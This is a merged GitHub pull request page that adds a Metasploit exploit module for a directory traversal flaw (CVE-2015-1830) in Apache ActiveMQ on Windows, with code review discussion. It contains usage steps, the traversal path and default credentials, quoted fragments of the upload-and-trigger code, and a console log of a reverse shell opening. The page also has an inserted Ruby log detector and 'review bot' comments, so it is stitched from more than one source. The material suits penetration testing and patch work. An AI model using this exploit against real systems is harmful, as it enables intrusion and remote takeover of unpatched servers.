
Add apache_activemq_traversal_upload module to /modules/exploits/windows/http/ #12910

Merged
merged 5 commits into from Mar 5, 2020

Conversation

kalba-security (Contributor) commented Feb 4, 2020

About

This change adds a new module to /modules/exploits/windows/http/ that can be used to exploit a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. The change also adds documentation for this module. For more information about this vulnerability, please check the documentation file or https://www.cvedetails.com/cve/CVE-2015-1830/.

Vulnerable System

Apache ActiveMQ 5.x before 5.11.2 for Windows.

Verification Steps

  1. Install the module as usual
  2. Start msfconsole
  3. Do: use exploit/windows/http/apache_activemq_traversal_upload
  4. Do: set RHOSTS [IP]
  5. Do: set payload [payload]
  6. Do: set LHOST [IP]
  7. Do: exploit

Options

  1. PASSWORD. The default setting is admin.
  2. PATH. This option is the traversal path. /fileserver/..\admin\ by default.
  3. Proxies. This option is not set by default.
  4. RHOSTS. To use: set RHOSTS [IP]
  5. RPORT. The default setting is 8161. To use: set RPORT [PORT]
  6. SSL. The default setting is false.
  7. THREADS. The default setting is 1.
  8. USERNAME. The default setting is admin.
  9. VHOST. This option is not set by default.
  10. TARGETURI. This option is the base path. / by default.

Compatible Payloads

  1. generic/custom
  2. generic/shell_bind_tcp
  3. generic/shell_reverse_tcp
  4. java/jsp_shell_bind_tcp
  5. java/jsp_shell_reverse_tcp

Payload Options

  1. LHOST. To use: set LHOST [IP]
  2. LPORT. The default setting is 4444. To use: set LPORT [PORT]
  3. SHELL. This option is not set by default.

Scenarios

msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   admin                  yes       Password to authenticate with
   PATH       /fileserver/..\admin\  yes       Traversal path
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161                   yes       The target port (TCP)
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                      yes       The base path to the web application
   USERNAME   admin                  yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[*] Payload executed!
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
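As an added example (not code from the PR or the module), a small Ruby detector that, run over constructed access-log lines, flags the sequence the description above lays out: a PUT into /fileserver/ whose path carries a traversal segment, followed by a GET of the same name under /admin/ from the same source. The NCSA-style log format is an assumption.

```ruby
require 'uri'

# Constructed sample access-log lines (NCSA-style, an assumption about how the broker's
# HTTP front end logs requests); not taken from the PR or from any real system.
SAMPLE_LOG = <<~'LOG'
  192.168.1.1 - admin [04/Feb/2020:10:55:30 +0100] "PUT /fileserver/..\admin\qwertyuiop.jsp HTTP/1.1" 204 0
  192.168.1.1 - - [04/Feb/2020:10:55:31 +0100] "GET /admin/qwertyuiop.jsp HTTP/1.1" 200 512
  10.0.0.5 - - [04/Feb/2020:11:00:00 +0100] "PUT /fileserver/report.txt HTTP/1.1" 204 0
  10.0.0.9 - admin [04/Feb/2020:11:02:00 +0100] "PUT /fileserver/..%5cadmin%5cabcdefghij.jsp HTTP/1.1" 204 0
  10.0.0.7 - - [04/Feb/2020:11:03:00 +0100] "GET /admin/index.jsp HTTP/1.1" 200 4096
LOG

LINE_RE = /\A(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/
# A ".." segment followed by a slash or backslash, raw or percent-encoded.
TRAVERSAL_RE = %r{(\.\.|%2e%2e)(/|\\|%2f|%5c)}i

def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  { src: m[1], user: m[2], method: m[4], path: m[5], status: m[6].to_i }
end

# True for a PUT into the file server whose path contains a traversal sequence.
def traversal_put?(req)
  req[:method] == 'PUT' && req[:path].start_with?('/fileserver/') && TRAVERSAL_RE.match?(req[:path])
end

# One finding per traversal PUT, plus a second finding when the same source later fetches
# the uploaded name under /admin/, i.e. the upload-then-execute pattern the module relies on.
def detect(log_text)
  reqs = log_text.each_line.map { |l| parse_line(l.strip) }.compact
  findings = []
  reqs.each_with_index do |req, i|
    next unless traversal_put?(req)
    name = URI.decode_www_form_component(req[:path]).split(%r{[\\/]}).last
    findings << { src: req[:src], kind: 'traversal_put', name: name }
    follow = reqs.drop(i + 1).find do |later|
      later[:src] == req[:src] && later[:method] == 'GET' && later[:path].end_with?("/admin/#{name}")
    end
    findings << { src: req[:src], kind: 'uploaded_jsp_executed', name: name } if follow
  end
  findings
end

detect(SAMPLE_LOG).each { |f| puts "#{f[:kind]} from #{f[:src]}: #{f[:name]}" } if $PROGRAM_NAME == __FILE__
```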

kalba-security (Contributor, Author) commented Feb 5, 2020

Hey FYI, vulnerable activemq versions for testing can be downloaded from https://activemq.apache.org/download-archives. Installing one of those and testing the module should be rather quick.

@dwelch-r7 dwelch-r7 self-assigned this Feb 28, 2020
end

def check
print_status("loaded check")

cbrnrd (Contributor) Feb 28, 2020

This is unnecessary. If the user wants to run check, they know it's running/loaded

[
[ 'Windows Java',
{
'Arch' => ARCH_JAVA,

cbrnrd (Contributor) Feb 28, 2020

I know this is JSP, but does it actually affect the JRE running on the server? Not really sure if this is completely necessary.

dwelch-r7 (Contributor) Feb 28, 2020

The Arch affects what payloads are available to be selected when running the module, this looks like the right choice


def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ directory traversal shell upload',

cbrnrd (Contributor) Feb 28, 2020
Suggested change
'Name' => 'Apache ActiveMQ directory traversal shell upload',
'Name' => 'Apache ActiveMQ Directory Traversal Shell Upload',

cbrnrd (Contributor) Feb 28, 2020

Also specify a version of Apache ActiveMQ if possible


def exploit
print_status("Uploading payload...")
testurl = Rex::Text::rand_text_alpha(10)

cbrnrd (Contributor) Feb 28, 2020

This variable name is kind of misleading as it's the filename, not the url.

'Description' => %q{
This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell.
},
'Author' => 'Erik Wynter', #@wyntererik
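Review bot: the Description hard-codes the traversal path `/fileserver/..\\admin\\` and the credentials `admin:admin`, but PATH, USERNAME and PASSWORD are all module options (see the Options list in the PR body), so the text should present them as defaults rather than fixed values, e.g. "using an HTTP PUT request with the configured credentials (admin:admin by default)" and "via the configured traversal path (/fileserver/..\\admin\\ by default)".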

cbrnrd (Contributor) Feb 28, 2020

Did you discover the vulnerability or just write the module or both? Conventionally it is detailed in the comments.

3. Do: `use exploit/windows/http/apache_activemq_traversal_upload`
4. Do: `set RHOSTS [IP]`
5. Do: `set payload [payload]`
6. Do: `set LHOST [IP]`

cbrnrd (Contributor) Feb 28, 2020

Consistency:

4. Do: `set RHOSTS [IP]`
5. Do: `set PAYLOAD [payload]`
6. Do: `set LHOST [IP]`

or

4. Do: `set rhosts [IP]`
5. Do: `set payload [payload]`
6. Do: `set lhost [IP]`

## Verification Steps

1. Install the module as usual

cbrnrd (Contributor) Feb 28, 2020

This isn't necessary. If it's merged it will be included in the framework and won't have to be installed.

])
end

def check

cbrnrd (Contributor) Feb 28, 2020

Whitespace. This line should be indented 2 spaces and everything in the function should be adjusted accordingly.

res1 = send_request_cgi({
'uri' => normalize_uri(target_uri.path,"admin/#{testurl}.jsp"),
'headers' => {
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])

cbrnrd (Contributor) Feb 28, 2020

Indent this 2 spaces

testurl = Rex::Text::rand_text_alpha(10)
vprint_status("If upload succeeds, payload will be available at #{target_uri.path}admin/#{testurl}.jsp") #This information is provided to allow for manual execution of the payload in case the upload is successful but the GET request issued by the module fails.

res = send_request_cgi({
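Review bot: the path printed by the vprint_status line is built by string concatenation, `#{target_uri.path}admin/#{testurl}.jsp`, while the request in the check method uses `normalize_uri(target_uri.path, "admin/#{testurl}.jsp")`; if TARGETURI is set without a trailing slash the printed location no longer matches where the file is requested, so build the printed path with normalize_uri as well. The long trailing comment explaining why the path is printed would also read better on its own line above the call.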

cbrnrd (Contributor) Feb 28, 2020

This doesn't need to be saved as a variable if you're not referencing it

dwelch-r7 (Contributor) commented Feb 28, 2020

> Hey FYI, vulnerable activemq versions for testing can be downloaded from https://activemq.apache.org/download-archives. Installing one of those and testing the module should be rather quick.

Was able to test, works well, thanks for your contribution
Are you still interested in working on this PR with us?

kalba-security (Contributor, Author) commented Feb 28, 2020

> > Hey FYI, vulnerable activemq versions for testing can be downloaded from https://activemq.apache.org/download-archives. Installing one of those and testing the module should be rather quick.
>
> Was able to test, works well, thanks for your contribution
> Are you still interested in working on this PR with us?

Hey yeah sure! I'm glad it's finally being reviewed. I could commit all the issues mentioned so far on Monday or Tuesday. I won't have time before then unfortunately.
FYI I wrote only the module and will make sure to add a reference to the original exploit and its author. Also, I'm pretty sure this exploit only works with Java payloads, but I could run some more tests.

dwelch-r7 (Contributor) commented Mar 2, 2020

@kalba-security that sounds great thanks!

kalba-security (Contributor, Author) commented Mar 3, 2020

@dwelch-r7 I think this should cover all suggestions from the code review. Please let me know if I can help with anything else.


include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Apache ActiveMQ directory traversal shell upload',
'Name' => 'Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload',
'Description' => %q{
This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache ActiveMQ 5.x before 5.11.2 for Windows. It tries to upload a JSP payload to the /admin directory via the traversal path /fileserver/..\\admin\\ using an HTTP PUT request with the default credentials admin:admin. It then issues an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the payload and obtain a shell.

dwelch-r7 (Contributor) Mar 4, 2020

@kalba-security If you could just split this description up a bit I think that's the last thing and then I'd be good to land it

kalba-security (Author, Contributor) Mar 4, 2020

> @kalba-security If you could just split this description up a bit I think that's the last thing and then I'd be good to land it

Done! @dwelch-r7

dwelch-r7 added a commit that referenced this pull request Mar 5, 2020
@dwelch-r7 dwelch-r7 merged commit 6338994 into rapid7:master Mar 5, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
dwelch-r7 (Contributor) commented Mar 5, 2020

Release Notes

This adds a module to exploit CVE-2015-1830, which is a directory traversal vulnerability in Apache ActiveMQ on Windows. It works by uploading and then executing a JSP file.

@kalba-security kalba-security deleted the kalba-security:apache_activemq_traversal_upload branch Mar 6, 2020